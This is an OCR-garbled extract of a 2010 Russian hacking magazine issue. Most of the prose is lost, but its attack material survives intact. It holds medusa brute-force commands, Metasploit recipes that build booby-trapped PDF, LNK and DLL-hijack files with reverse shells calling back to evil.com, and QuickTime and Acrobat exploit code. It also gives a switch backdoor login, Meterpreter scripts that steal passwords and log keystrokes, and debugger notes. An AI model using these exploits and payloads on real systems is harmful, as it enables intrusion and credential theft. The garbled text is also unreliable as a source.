function getCookie(best_candidate, all_candidates)
{
alert("The retrieved cookie is: " + best_
candidate + "\n" + "You can see what each storage
mechanism returned " + "by looping through the all_
candidates object.");
for (var item in all_candidates)
document.write("Storage mechanism " + item +
" returned: " + all_candidates[item] +
"<br>");
}
ec.get("id", getCookie);
</script>
X 11 /142/ 10
evercookie
SWF- PHP
evercookie . ,
, .
, Flash', .
, evercookie!

. ,
,
. : Google
Chrome, Opera, Internet Explorer Safari
Private Browsing ,
evercookie.
. .
evercookie
,
Isolated Storage Silverlight,
Java-.z
039

GreenDog agrrrdog@gmail.com)
Easy Hack
1
: ,
POP3, FTP, SSH ..
:
,
- . . . ,
- . (
? :) , ...
, . . , , - .
:
123456
Password
iloveyou
princess
rockyou ( )
abc123
Qwerty
Ashley
babygirl
monkey
Medusa . SSH
Medus.
SSH:
medusa -h victim.com -u root -P passwords.txt M ssh
, 32 ,
Imperva (imperva.com/ld/password_report.asp).
. .
, THC-Hydra (freeworld.thc.org/thc-hydra/)
Medusa (foofus.net/~jmk/medusa/medusa.html).
, BackTrack4,
h, -u ;
-P ;
-M .
, .
SMB:
- ( *nix- ).
: , , -
medusa -M smbnt -C combo.txt
. ,
: Medusa , Hydra
combo.txt ::. :
. .
, ,
foofus.net/~jmk/medusa/medusa-
compare.html ( ):
TELNET, AFP, CVS, FTP, HTTP, HTTPS, SOCKS5, HTTP-PROXY,
IMAP, MS-SQL, PostgreSQL, MySQL, NCP (NetWare), NNTP,
PCNFS, PcAnywhere, POP3, rexec, rlogin, rsh, Teamspeak,
SMB, SMBNT, SAP/R3, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN,
Telnet, VmAuthd, VNC, Cisco auth, ICQ, LDAPx ..
192.168.0.2:administrator:password
192.168.0.2:testuser:pass
192.168.0.3:administrator:blah
192.168.0.4:user1:foopass
,
.
, , XHydra :).
. . ,
passwords.ru -
: ,
:). Medusa
2.0, Hydra 5.7. - , .
040
.
awlg.org/index.gen,
, .
X 11 /142/ 10
:
EXE, DLL
:
, ,
, -
. , . , . ,
:). .
, ,
, OllyDbg (wasm.
ru/series.php?sid=17). , ,
- .
. . !
. , , , -
, . . ,
, Quick
Unpack 2.2 (qunpack.ahteam.org/?p=436). ! , , ,
exe. , UPX, ASPack, PE Diminisher,
UPX, QuickUnpack
PECompact, PE-PACK, PackMan, WinUPack .
,
DLL, , ,
, OEP finder,
LUA ( ). ,
:). ,
OEP finder .
:
. , 3G GPRS, , . ,
- . .
.
CanSecWest 2010 Collin
Mulliner
(mulliner.org/security/feed/random_tales_mobile_hacker.pdf).
DoS .
,
, .
,
HTTP-. ,
, ,
, . MSISDN ( ), IMEI (
) IMSI ( ). .
, .
: IP-
:
, , :).
, /
- .
, ,
, VPN,
. ,
X 11 /142/ 10
:
SIM, , - ?
( ) . , , -. , .
mulliner.org/pc.cgi. , ,
. , .
, ,
, , 3G- ,
.
.
. , ,
- .
ipaddresslocation.org, worldips.info,
IP.
, (RIPE, RIPN, etc.) .
RIPN (ru-center) - ipgeobase.ru.
, -
, - ,
- . :).
whois.
041
: WINDOWS ,

:
CC10,
Windows.
, ,
, :). ,
party10.cc.org.ru.
: , , Win7
.
. , ,
. ( , , Adobe, Mozill) .
,
DEP, ASLR ..
. ,
.
.
! MS , ,
, (
) , .
EMET 2.0, Enhanced Mitigation Experience Toolkit (blogs.technet.
com/b/srd/archive/2010/09/02/enhanced-mitigation-experience-toolkitemet-v2-0-0.aspx)
DEP,
SEHOP, ASLR , . ,
( , ) : DEP, ASLR, SEHOP,
heapspay .
, , , .
. MS: 0day-
ASLR Acrobat Reader.

DLL EMET -ASLR-, ROP
Acrobat Reader Win7 DEP, ROP,

, -ASLR- EMET
(blogs.technet.com/b/srd/archive/2010/09/10/use-emet-2-0-to-block-theadobe-0-day-exploit.aspx)
: technet.microsoft.com/en-us/security/ff859539.
aspx
WinXP c SP3, SEHOP
ASLR .
Win7 Win2008.
: ,
CLIENT-SIDE-
:
. -.
?
:). ,
- .
. ,
, DoS, . ,
, IDS, .
/, ,
, .
/
:). ,
Microsoft Adobe, - . ,
! :
Adobe Acrobat PDF Cooltype Sing ( <=9.3.4/8.2.4), MS DLL Hijacking,
MS LNK (MS10-046).

. , Metasploit
Framework. MSF
.
MSF, PoC. 0-day,
MSF. - , .
1) Adobe Acrobat PDF Cooltype Sing. Adobe
. . msfconsole :
042
Acrobat Reader. :)
:
msf > use exploit/windows/fileformat/adobe_cooltype_
sing
:
msf > set FILENAME xakep_ubileinyi_vypusk.pdf
? home:
msf > set OUTPUTPATH ~
:
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set LHOST evil.com
X 11 /142/ 10
MS Office
msf > set LPORT 80
evil.com netcat, ,
.
, -, NAT, ,
-, (
Acrobat Reader).
,
Adobe exploit/windows/browser/adobe_cooltype_
sing.
2) MS LNK (MS10-046). :)
:
msf >use windows/browser/ms10_046_shortcut_icon_
dllloader
:
msf >set PAYLOAD windows/meterpreter/reverse_tcp
msf >set LHOST 192.168.0.101
, WebDAV .
,
. (
WebDAV). - :).
DLL .
, , .
$msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.0.101 D > evil.dll
:
windows/meterpreter/reverse_tcp ,
X 11 /142/ 10
LHOST=192.168.0.101
D , DLL;
evil.dll .
3) MS DLL Hijacking
! - .
-
AutoCAD, . - . . , , , !
. !
:).
:
:
msf > use windows/browser/webdav_dll_hijacker
:
msf > set BASENAME policy
:
msf > set EXTENSIONS ppt
:
msf > set SHARENAME docs
:
msf > set PAYLOAD windows/meterpreter/bind_tcp
\\192.168.0.101\
docs\, HTTP- http://192.168.0.101:80.
. :).
, ,
WebDAV. z
043

, Digital Security a.sintsov@dsec.ru
01
DLL
HIJACKING
TARGETS
Windows XP
WIndows 7
Windows 2000/2003/2008
CVE
N/A
BRIEF
- Microsoft.
. , (Simon
Raner) Arcos Apple iTunes , , DLL-
. ,
, .
,
WebDAV.
, - . , Apple iTunes,
DLL, . ,
2010 ,
, 2000 . , 10
(Georgi Guninski)
, Windows
.DLL-, Microsoft
Office. , , , ,
, , . (, ,
). , ,
, Metasploit.
, ,
, , .
EXPLOIT
.
Windows :). , , .
, API- LoadLibrary
044
( ). ,
, DLL; ,
:
LoadLibrary("bzik.dll");
, DLL- ,
, .
Windows , ,
, :
1.
2.
3.
4.
5.
6.
, ;
;
16- ;
Windows;
;
PATH.
,
, . , (.TXT- ,
.TORRENT uTorrent, .XLS Excel ..) D:\zloba,
.
, , ,
. ,
HTTP WebDAV. , bzik.dll
PATH, ,
, , bzik.dll , D:\zloba,
PATH. ,
D:\zloba bzik.dll?
. : , DLL-,
,
. uTorrent, P2P,
.TORRENT.
,
.
c .TORRENT.
, ProcessExplorer,
utorrent.exe.
.
.TORRENT- . ,
X 11 /142/ 10
DLL Hijacking
utorrent.exe
. -
.DLL- ,
plugin_dll.dll. plugin_dll.dll
.
,
msfpayload Metasploit:
$ msfpayload windows/exec CMD=calc D > plugin_dll.dll
- .TORRENT-
, . , , Rapid7 https://www.metasploit.
com/redmine/projects/framework/repository/raw/external/source/
DLLHijackAuditKit.zip ( FAQ United). , exploit-db.com/
dll-hijacking-vulnerable-applications/.
DLL,
API- ,
(Taeho Kwon) (Zhendong
Su) cs.ucdavis.edu/research/tech-reports/2010/CSE-20102.pdf. ,
, ,
, .
DLL Hijacking
, ,
:
SetDllDirectory("");
, LoadLibrary.
02
APPLE
QUICKTIME
TARGETS
SOLUTION
,
, Microsoft - , :
;

WebDAV;

WebDAV, .
X 11 /142/ 10
* Apple QuickTime < 7.6.8

CVE
CVE-2010-1818
BRIEF
,
, , , ..
- .
, . ,

Apple, QuickTime.
,
045
DLL Hijacking
QuickTime
- (Ruben Santamarta)
ActiveX- QuickTime.
EXPLOIT
,
_Marshaled_pUnk. ActiveX
:
push
offset a_marshaled_pun ; "_Marshaled_pUnk"
push
ebx
;
call
ebp ; lstrcmpiA ; "_Marshaled_pUnk"
test
eax, eax
; ?
jnz
short loc_10002C4A ; , -
;
push
edi
call
sub_10001310
; LONG
add
esp, 4
lea
ecx, [esi+13B8h]
push
ecx
; ppv
push
offset iid
; iid
; (4 )
push
eax
call
ds:CoGetInterfaceAndReleaseStream ;
, iStream (eax)!
, , _Marshaled_
pUnk, . , ,
. ,
QuickTime (6.5.1.17)
,
, ,
. ,
, ,
. ,
, iStream
vTable. , Heap
Spray , ROP-
DEP . ROP
vTable:
Heap addr
Value
15220c20
15220c18 // VTable
-- ALL[15220c18+0x0C]
046
15220c24

15220c28
15220c2c
15220c30
ROP_ADDR // ROP-
ROP_ADDR // ROP-
ROP_ADDR
ROP_ADDR
Heap Spray 0x15220000,

:
var targ = 0x15220c20;
var obj = '<' + 'object classid="clsid:02BF25D5-8C174B23-BC80-D3488ABDDC6B" width="0" height="0"' + '>'
+ '<' + 'PARAM name="_Marshaled_pUnk" value="' + targ +
'"' + '/>'
+ '</'+ 'object>';
document.getElementById('xpl').innerHTML = obj;
Metasploit,
QuickTime :).
, 7.6.7
Windows XP SP3. ASLR, . , ROP-,
ASLR.
SOLUTION

QuickTime ( 7.6.8).
03
TARGETS
* 3Com 3812
* 3Com 3870
* Edgecore ES4649
* Dell PowerConnect 5224
*
CVE
N/A
X 11 /142/ 10

:)
BRIEF
,
, HAR2009,
(Edwin Eefting), (Erik Smit)
(Erwin Drent) , , Accton,
.
, ,
, , , .
,
, , . , ,
?
EXPLOIT
: Linux ,
-
: __super. - ,
, . ,
,
,
, .
, ,
MAC- . , ,
MAC, , , ...
. , - ,
, .
- , MAC-. ,
, , ARP-, , , SNMP-.
, SSH,
telnet- HTTP-. __super.
:
1. MAC :
# arp -an | grep 10.0.1.2
? (10.0.1.2) at 00:0E:6A:CB:B4:41 [ether] on eth0
Acrobat Reader , VeriSign

# perl accton.pl 000E6ACBB441
!!98DMlH
3. :
# telnet 10.0.1.2
Trying 10.0.1.2...
Connected to 10.0.1.2.
Escape character is '^]'.
Login: __super
Password: !!98DMlH
Menu options: -------3Com SuperStack 3 Switch 3824 24port--------------------bridge
- Administer bridge-wide parameters
feature
- Administer system features
gettingStarted - Basic device configuration
logout
- Logout of the Command Line Interface
physicalInterface - Administer physical interfaces
protocol
- Administer protocols
security
- Administer security
system
- Administer system-level functions
trafficManagement - Administer traffic management
MAC-.
, :).
SOLUTION

IP-:
2. :
X 11 /142/ 10
047
Acrobat Reader
Console#config
Console(config)#management ?
all-client Adds IP addresses to SNMP, Web and Telnet
groups
http-client Adds IP addresses to the Web group
snmp-client Adds IP addresses to the SNMP group
telnet-client Adds IP addresses to the Telnet group
Console(config)#management all-client ?
A.B.C.D Starts IP address
Console(config)#management all-client 192.168.1.1 ?
A.B.C.D Ends IP address
Console(config)#management all-client 192.168.1.1
192.168.1.10
, ,
.
- . , ,
, , . -
Full-Disclosure :).
04
Acrobat Reader,

.
.
,
DEP, ASLR.
ROP , ASLR. -
,
. , PDF-

. .
EXPLOIT
. , , . ,
Acrobat Reader SIGN- TrueType.
-...

ADOBE ACROBAT READER
TARGETS
* Adobe Acrobat Reader <= 9.3.4

CVE
CVE-2010-2883
048
48
BRIEF
Abysssec 0-day.
, ,
, Po.
Micrososft, Mozilla, Sun, Novell, HP ..
exploit-db.com,
, . abysssec.com/
blog/2010/09/moaub-1.
X 11 /142/ 10
Acrobat Reader Windows 7

, uniqueName,
. ,
strcat.
. ,
uniqueName ,
.
:
ROP-,
0x0C0C0C0C. Heap Spray ROP. , , . DEP. ,

API-, VirtualProtect/VirtualAlloc WriteProcessMemory,
. iso88591 ,
API- CreateFileA. ROP-
CreateFileMappingA,
MapViewOfFile .
DEP.
LPVOID MapViewOfFile(
HANDLE hFileMappingObject, // . X 11 /142/ 10
(, CreateFileMappingA)
DWORD dwDesiredAccess, // ( 0x22 FILE_MAP_EXECUTE | FILE_MAP_WRITE)
DWORD dwFileOffsetHigh, // DWORD - 0
DWORD dwFileOffsetLow, // DWORD - 0
SIZE_T dwNumberOfBytesToMap // - 0x1000
);
,
, .

( memcpy).
,
. ROP DEP, ASLR,
ROP-
icucnv34.dll, ASLR,
, Windows 7.
,
Metasploit !
SOLUTION
Adobe Acrobat Reader .z
049

, Digital Security a.sintsov@dsec.ru
BANK
CLIENT
-:

- (IPS, AntiVirus, ); , ,
.
.
, WEBMONEY PAYPAL,
,
.
, ,
, -
.
050
, ,
, .
, ,
. ,
, ( X 11 /142/ 10
Inter-PRO - BoF
), -. :
, ,
. .
(
),
.

(, ..), , , .
. ()
,

/ / , . - , ,
.
( ). ,
(, , ..) , .
, . ,
, , .
. , :
1. -;
2. ;
3. ( );
4. ;
5. ;
6. .
. -, .. ..
,
-. :
-
-
-
-
ATM-
, ,
. ,
! , ,
X 11 /142/ 10

34.10 2001 (: )
,
.
,
, ,
, , , , .
. ,
- (
Java) , , , Java- ActiveX,
( ,
). ActiveX? ,
Windows
. ,
.
-
, , , ActiveX ,
.
, .
, ,
. ,
.
.
, , .. .
,
.
, .
, ? -,
051
, , ,
.
, , , - , .
,
,
- () ( ).
.
, ,
, -
-. , , , ,
, , , ,
. ? :) .
1 ERP- , ,
, .
: - , . ,
, ,

. , ,
, . ,
, ,
, .
, ,
. , - ,
, , , . , ,
, , ,
, , ,
, . ,
, ( ,
). ,
,
(). ,
!
34.10 2001. - 34.11-94.
,
.
USB-Token
, - .. , USBToken . USB-Token?
USB-,
. -
052
-
, ,
( )
. , . , ,
R-Admin,
USB . ,
,
. USB-Token . , .
Token ..,
,
.
: , ,
, , , , -,
.
, , ,
. :
WiFi
, (
)
WiFi ( WEP,
, WiFi,
MAC-, 3Com-,
3Com-, ,
, ).
- , ,
,
IP-
( ARP-SPOOF
HASH+CONST handshake Ranibow-Table profit!).
, ,
, netbios
: BANK01, BANK02. ,
, ,
-
. WiFi-,
, .
X 11 /142/ 10
.
, , ,
,
- :). ,
, ... ,
,
, ..
-
USB-oken,
, -,
, .
( , , 2-3
WiFi-, , ) ,
.
- , ,
. .
: , ,
, ,
,
HDD . , IDS IP , ,
.
.
,
. , , ,
, -
. -
, .
, , ,
. , ,
, -.
, , ,
, exploit-pack, Acrobat Reader, - .
. , -
. .
, , . : ,
. .
- , - - .
ERP- ( 1C, ),
( ) , ( , )
, , 700 .
,
, - . , . , -, , ,
.
, -,
X 11 /142/ 10
, - , ( USB), ,
.. ..
( ][ #112,
). , /
, , .
, , ,
USB-Token , ,
- ,
( ).
.
, , , ,
. ,
. , ,
. . -, ,
N, ,
.
. , ,
, . -
,
, , ,
:). ,
, (, ,
) . , . , , , , !
, , .
, , ,
- ,
.
: XSS-, SQL-,
, ..,
.. ,
- -. ,
, , ,
,
, .
:
, , , , , .
: .
, , .
, ,
, (
CSRF) , update . ,
,
.
SQL- XSS

053
0day
, - .
, ,
, ActiveX -
(BSS). ,
, ,
.
,
. .
(Inist, R-Style).
,
ActiveX (
CC10
?.
.
). ,
ActiveX, , ,
Faktura.ru :). (
). ,
. ,
... ,
, . ,
ActiveX, ,
( , DSecRG,

). , -
ActiveX, ,
( ,
).
, , Inter-PRO - , .
, ( , ). ,
( ActiveX,
- ). ( )
, Inter-PRO (DoS).
, , ( ),
-.

(
, , -,
). , . , -
054
/GS (, GS,
,
DoS Code Execution). ,
, Permanent DEP, ASLR, SEHOP, GS
, . InterPRO GS, , . ,
Flash, Acrobat Reader, Windows
..,
, -
( , ).
? , ,
, ,
- , .
1) ;
2)
;
3) ;
4) USB-oken

!
5) ;
6) , ,
. ;
7)
IP , ( );
8) -;
9) , , . ;
10) ;
11) ,
, .
, , ,
, , . - ,
-, , , - .
.
, ,
...z
X 11 /142/ 10
r GreenDog agrrrdog@gmail.com
METERPRETER

MSF
,
Metasploit Framework. , MSF
Meterpreter. advanced payload ,
, , .
MSF METERPRETER
( )
, -
. , msfgui, . msfgui
:).
, , MSF,
Meterpreter (MP) - . , .
Meterpreter , MSF , ,
- .
(/bin/sh, cmd.exe)?
, :). ,
, . -,
.
. -, IDS
: , -,
. -, chroot, ,
X 11 /142/ 10
. -, ,
, , .

.
, , ?. -, MP .
?
:). . ,
MP ,
.
Windows- ( ,
cmd.exe -
:). Linux ,
. Mac 2009 Charlie Miller Vincenzo Iozzo.
Win- MP ( ,
).
dll .
MP . - MP dll,

. , MP
055
.bashrc
, , . , MSF. Ruby,
Meterpreter API :). -, .
MP- hashdump
- ( h :), ][
.
Railgun. ,

dll . MP
DLL: dll injection reflective dll injection.
. ,
(PEB) . .
chroot / MP
.
, / ,
/. - MP ,
dll ,
, MP . -
Meterpreter xor.
MP .
, heap jit-
, , ,
.
, , ,
. ( ) . -
. MP (migrate)
. , -,
- (
), , -,

, .
056
MP , .
. ,
, MP .
,
MP -. , antimeter2 mertsarica.com
MP.
meterpreter
. , MP Win, .
MP PHP JAVA.
? :).
. ,
MP, .
PHP MP php ,
- - ,
LFI SQL-. , dll-
. ,
, , , .
, , . PHP JAVA MP
.
MP, , .
,
. API Rex ( MSF) MSF. API metasploit
( ), (2004 .) MP, - , API (
\msf3\documentation). ,
, -
X 11 /142/ 10
Meterpreter
MP
.
(, , :).
, .
,
API. , .
:
r=client.sys.process.execute("command.exe", nil,
{'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
end
cmdout << tmpout
r.channel.close
r.close
:
cmd_exec(cmd)
. :
key = 'HKLM\\System\\...'
root_key, base_key = session.sys.registry.
splitkey(key)
value = "Value"
open_key = session.sys.registry.open_key(root_key,
base_key, KEY_WRITE)
open_key.set_value(value, session.sys.registry.
type2str("REG_DWORD"), 0)
:
registry_setvaldata(key,valname,data,type)
, MSF
MSF.
MSF . , .
.
-, MSF *nix Meterpreter.
UTF, MP cp1251, 866. ,
, .
http://takeworld.blogspot.com/2008_11_01_archive.html.
MSF
cygwin.
.bashrc, , :
export LANG="ru_RU.CP1251"
alias ls='ls --show-control-chars'
X 11 /142/ 10
(\msf3\lib\msf\). MP ,
.
( MSF
). MP
Carlos Perez. , darkoperator.com,
, , .
:
run bgrun ;
session s msf-;
AutoRunScript InitialAutoRunScript .
, :
metsvc, scheduleme, persistence MP
;
autoroute
;
scraper, checkvm, winenum, get_env, enum_powershell_
env, enum_logged_on_users, domain_list_gen,
remotewinenum ;
get_local_subnets, netenum, arp_scanner, dumplinks
;
get_application_list, enum_vmware, prefetchtool
;
getgui, gettelnet, vnc RDP, telnet
VNC-;
getcountermeasure, killav AV, UAC, ;
hashdump, credcollect, , ;
winbf ;
screen_unlock ;
wmic wmic-;
schtasksabuse ;
enum_firefox, enum_putty, getvncpw, get_filezilla_
creds, get_pidgin_creds ;
panda_2007_pavsrv51, pml_driver_config, srt_webdrive_
priv, kitrap0d ;
search_dwld, file_collector - ;
migrate, keylogrecorder, packetrecorder
MP;
multicommand, multiscript, uploadexec
.
, . , -
. .
.
,
, , , ,
. ,
nirsoft.
net, ,
. ( ) :
session = client
host,port = session.tunnel_peer.split(':')
057
Windows File Protection.
end
r.channel.close
r.close
#
session.sys.process.execute("cmd.exe /c del
#{tmp}\\#{passrecscranble}.exe", nil,
{'Hidden' => 'true'})
#

RDP
session.fs.file.download_file(
"#{logs}#{::File::Separator}#{exename}.txt",
"#{tmp}\\#{logscranble}")
# Temp
tmp = session.fs.file.expand_path("%TEMP%")
print_status(
"Finnished downloading logs with passwords")
# ,
session.sys.process.execute(
logs = ::File.join(Msf::Config.config_directory,
'logs', 'getpass',
"cmd.exe /c del #{tmp}\\#{logscranble}",

nil, {'Hidden' => 'true'})
host + "-"+ ::Time.now.strftime("%Y%m%d.%M%S"))
getpass(session,tmp,logs,"PasswordFox.exe")
, ,
. : ,
, PasswordFox.exe data msf3.
def getpass(session,tmp,logs,exename)
::FileUtils.mkdir_p(logs)
#
# ,
#
passrecexe = File.join(Msf::Config.install_root,
"data", "#{exename}")
passrecscranble = sprintf("%.5d",rand(100000))
logscranble = sprintf("%.5d",rand(100000))
session.fs.file.upload_file(
"#{tmp}\\#{passrecscranble}.exe",
. , .
. Patrick HVE - MP.
Railgun! ? .
API. ,
dll . , ?
:) MP ( irb):
"#{passrecexe}")
#
#
>>client.core.use("railgun")
>>client.railgun.user32.MessageBoxA(0,"Hello,
world!","Test","MB_OK")
r = session.sys.process.execute("cmd.
exe /c #{tmp}\\#{passrecscranble}.exe /stext
#{tmp}\\#{logscranble}", nil,
{'Hidden' => 'true','Channelized' => true})
sleep(2)
#
prog2check = "#{passrecscranble}.exe"
found = 0
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
print "."
sleep(0.5)
, .
railgun:
1) client.railgun.{DLL-Name}.{FunctionName}
({Parameters});
2) . ,
return GetLastError;
3) . api_constants.rb;
4) NULL, nil;
5) , .
railgun (. msf3\lib\rex\post\meterpreter\extensions\
railgun\api.rb) 1000 API kernel32, user32, ntdll,
ws2_32. , dll:
found = 0
end
end
058
>>client.railgun.add_dll('smartcard','c:\\program
files\\smartcard\\smrtcrd7823.dll')
X 11 /142/ 10
=>
>>
=>
>>

:
railgun.add_function( 'kernel32',
'ReadFile', 'BOOL',[
["DWORD","hFile","in"],
["PBLOB","lpBuffer","out"],
["DWORD","nNumberOfBytesToRead","in"],
["PDWORD","lpNumberOfBytesRead","out"],
["PBLOB","lpOverlapped","inout"],
])

railgun.
.
( ):
#
client.core.use("railgun")
#
a = client.railgun.kernel32.
GetLogicalDrives()["return"]
#
drives = []
letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
(0..25).each do |i|
test = letters[i,1]
rem = a % (2**(i+1))
if rem > 0
drives << test
a = a - rem
end
end
print_line("Drives Available = #{drives.
inspect}")
:
MP
meterpreter > bgrun keylogrecorder -c 1 -t
15

meterpreter > irb
>> client.core.use("railgun")
X 11 /142/ 10
true
client.railgun.user32.LockWorkStation()
{"GetLastError"=>0, "return"=>true}
exit
,
, . ,
,
.
m0r0 :
. , : forum.antichat.ru/
threadnav99665-1-10.html. : -
WinXP,
RDP. termsrv.dll .
RDP,
. , ,
Windows File
Protection , dll. . MP
. , railgun,
.
, .
, ,
WinAPI. WinAPI. -, MP
,
:
kernel32.MoveFileA("c:\\windows\\system32\\
termsrv.dll","c:\\windows\\system32\\
termsrv.old")
-,
:
parHWND=user32.FindWindowA("#32770",nil)
:
chHWND=user32.FindWindowExA(parHWND["return
"],0,nil,
"#{cancel}")
:
user32.PostMessageA(chHWND["return"],
"WM_LBUTTONDOWN",0,0)
user32.PostMessageA(chHWND["return"],
"WM_LBUTTONUP",0,0)
HTTP://WWW
links
PHP Meterpreter
blog.metasploit.
com/2010/06/meterpreter-for-pwnedhome-pages.html
Java Meterpreter
schierlm.users.
sourceforge.net/
JavaPayload/
metasploit.com/redmine/issues/406
metasploit
metasploit.com

meterpreter API
metasploit.com/
documents/meterpreter.pdf
MP
darkoperator.com
WinAPI
Railgun
msdn.microsoft.
com/en-us/library/
aa383749

msdn.microsoft.
com/en-us/library/
ms681381
(VS.85).aspx
WinAPI
undocumented.
ntinternals.net/;
source.winehq.org/
WineAPI/
dll injection nologin.org/

Downloads/Papers/
remote-library-injection.pdf
Reflective dll injection harmonysecurity.com/ReflectiveDllInjection.html
harmonysecurity.com/
files/HS-P005_ReflectiveDllInjection.pdf
.
MSF :).
, Meterpreter ,
,
, , .
! , . :).z
059

r0064 r0064@mail.ru
Windbg
Windbg ,
. , , ...
.
,
64- .
, , X64- WINDBG ,
64- WINDOWS,
32-
.
WinDbg . :
, (
, ). Ida.
interfaces. ,
( ). interfaces
.
, :
.text:0000000180012920
public interfaces
.text:0000000180012920
interfaces proc near
.text:0000000180012920
mov [rsp+arg_18], r9d
.text:0000000180012925
mov [rsp+arg_10], r8
.text:000000018001292A
mov [rsp+arg_8], rdx
.load _
.unload.
, ndis, ndiskd, Windbg 6.11.1.404
(ndiskd.dll WDK \Debugging
Tools for Windows (x64)\winxp). , !ndiskd.interfaces :
Can't get offset of Link in NDIS_IF_BLOCK!.
opens, protocols . , . ,
060
.text:000000018001292F
mov [rsp+arg_0], rcx
.text:0000000180012934
push rbx
....
.text:00000001800129AF
lea r8, [rsp+0C8h+var_2C]
.text:00000001800129B7
lea rdx, aLink ; "Link"
.text:00000001800129BE
mov rcx, cs:NDIS_IF_BLOCK_NAME
; Link NDIS_IF_BLOCK
.text:00000001800129C5
call GetFieldOffset
.text:00000001800129CA
test eax, eax

X 11 /142/ 10
WinDbg fdbg
.text:00000001800129CC
jz short loc_1800129E0
.text:00000001800129CE
lea rcx, aCanTGetOffs_22
DriverEntry ?
, , int 3 ,
. ? , . , WinDbg
,
. . IopLoadDriver. ,
, ,
( ,
). Vista (
, IopLoadDriver):
; "Can't get offset of Link in NDIS_IF_BLO"...

.text:00000001800129D5
call cs:ExtensionApis.lpOutputRoutine+4
.text:00000001800129DB
jmp loc_180012BF1
, Link NDIS_IF_BLOCK_NAME. ,
NDIS_IF_BLOCK_NAME.
.text:0000000180001260 aNdisNdis_if_bl db 'ndis!NDIS_
IF_BLOCK',0
:
dt ndis!NDIS_IF_BLOCK
, : Symbol ndis!NDIS_
IF_BLOCK not found. dt ndis!_NDIS_IF_BLOCK . ,
, . - hex-.
010 Editor. . ,
, .
.
, ,
, .
, ndis!LIST_ENTRY :
.data:0000000180018470 LIST_ENTRY_NAME dq offset
aNdis_list_entr ; DATA XREF: pktpools+5Dr
, 68
14 00 80 01 00 00 00. -
.
ndiskd .
X 11 /142/ 10
PAGE:00000001403AC40A loc_1403AC40A:
PAGE:00000001403AC40A
; IopLoadDriver+98Bj
PAGE:00000001403AC40A mov
rdx, rsi
PAGE:00000001403AC40D mov
rcx, rbx
PAGE:00000001403AC410 call
qword ptr [rbx+58h]
; DRIVER_OBJECT.DriverInit
, , 0x58 DRIVER_OBJECT
DriverInit, kd dt _DRIVER_
OBJECT.
:
48 8B D6 48 8B CB FF 53
58
,
WinDbg:
s nt!IopLoadDriver L2000 48 8B D6 48 8B CB FF 53
58
s , nt!IopLoadDriver
, L2000 ,
, 48 8B D6 48 8B CB FF 53 58 , .
- :
fffff800`01c0940a 48 8b d6 48 8b cb ff 53-58 4c 8b
15 5e 20 dd ff H..H...SXL..^ ..
.
. fffff800`01c0940a. .
, int 3 .
WinDbg ,
. . -
061
ndiskd
ida

Major- DRIVER_OBJECT, driver object .
!drvobj .
driver object tdx.sys.
.block
{
.catch
{
r $t0 = $arg1
.printf "Driver object at 0x%I64X\n",@$t0
r? $t1 = (nt!_DRIVER_OBJECT*)@$t0
r $t0 = @@c++(@$t1->Type)
.if(@$t0==4)
{
r $t0 = @@c++(@$t1->MajorFunction)
.for(r $t1=0;@$t1<1c;r $t1=@$t1+1)
{
r $t2 = @$t0+@$t1*8
r? $t3 = *(void**)@$t2
.printf " Function at 0x%I64X\n",@$t3
.if(@$t3!=0)
{
bp @$t3
}
}
}.else
{
.printf "Not a driver object!\n"
}
}
}
$arg1 ( $argN), t0-t19

-. , ++ (
for, while...). DRIVER_OBJECT.
Type, , DRIVER_
OBJECT ( !).
DRIVER_OBJECT.
MajorFunction. Major- (
27 - 0x1b).
( ), (bp @$t3). .printf. 64- (8 ), r $t2
= @$t0+@$t1*8. 32- ,
4.

r, , r?, .

- -
062
kd> !drvobj tdx

Driver object (fffffa8001ea1330) is for:
\Driver\tdx
Driver Extension List: (id , addr)
Device Object list:
fffffa8001ec72f0 fffffa8001ec52f0
fffffa8001ec12f0
fffffa8001ebf2f0 fffffa8001ebd2f0
fffffa8001ec32f0
fffffa8001eb5300
.
$$><_, $$<_ ( $<).
,
$$>a<_ ( ).
,
device objecta, .
$$ $arg1 - device object
$$ $arg2 - function number
.block
{
.catch
{
r $t0 = $arg1
.printf "Driver object at 0x%I64X\n",@$t0
r? $t1 = (nt!_DRIVER_OBJECT*)@$t0
r $t0 = @@c++(@$t1->Type)
.if(@$t0==4)
{
r $t0 = @@c++(@$t1->MajorFunction)
r $t1 = $arg2
$$checking second argument
.if(@$t1<1c)
{
r $t2 = @$t0+@$t1*8
r? $t3 = *(void**)@$t2
.printf " Function at 0x%I64X\n",@$t3
.if(@$t3!=0)
{
bp @$t3
u @$t3
}
.else
{
.printf "Invalid function address\n"
}
}
.else
X 11 /142/ 10
{
.printf "Invalid function number: must be
0-1B\n"
}
}.else
{
.printf "Not a driver object!\n"
}
}
}
$$.
. DeviceObject.Type=4,
0-1B, IRP_MJ_CREATE IRP_MJ_PNP.
u @$t3
.
(
):
kd> $$>a<c:\do2.wds fffffa8001ea1330 2
Driver object at 0xFFFFFA8001EA1330
Function at 0xFFFFFA600A60D830
tdx!TdxTdiDispatchClose:
fffffa60`0a60d830
push rbx
fffffa60`0a60d832
sub rsp,20h
fffffa60`0a60d836
cmp rcx,qword ptr
[tdx!TdxDeviceObject (fffffa60`0a61e650)]
fffffa60`0a60d83d
mov rax,qword ptr [rdx+0B8h]
fffffa60`0a60d844
mov rbx,rdx
fffffa60`0a60d847
je
tdx!TdxTdiDispatchClose+0x71
(fffffa60`0a60d8a1)
fffffa60`0a60d849
mov rcx,qword ptr [rax+30h]
fffffa60`0a60d84d
cmp qword ptr [rcx+20h],2
010 Editor
,
WinDbg pykd ( ,
),
.
Python.
, WinDbg. , , ,
. ,
, . , ,
e-mail. z

WinDbg pykd,
[en/ru]:
pykd.codeplex.com/wikipage?referringTitle=Home

Invalid function number: must be 0-1B
Debugging Tools for Windows,

WinDbg [en/ru]:
microsoft.com/whdc/devtools/debugging/default.mspx

Not a driver object!
,
Windbg [en]:
windbg.info/download/doc/pdf/WinDbg_A_to_Z_color.pdf
, .
,
. ,
X 11 /142/ 10

[en]:
dumpanalysis.org/WCDA/WCDA-Sample-Chapter.pdf
063

Positive Technologies
Shell
TCL-

TFTP-
./tftpboot/
.icmp.tcp
tftp://192.168.1.4/icmp.tcl
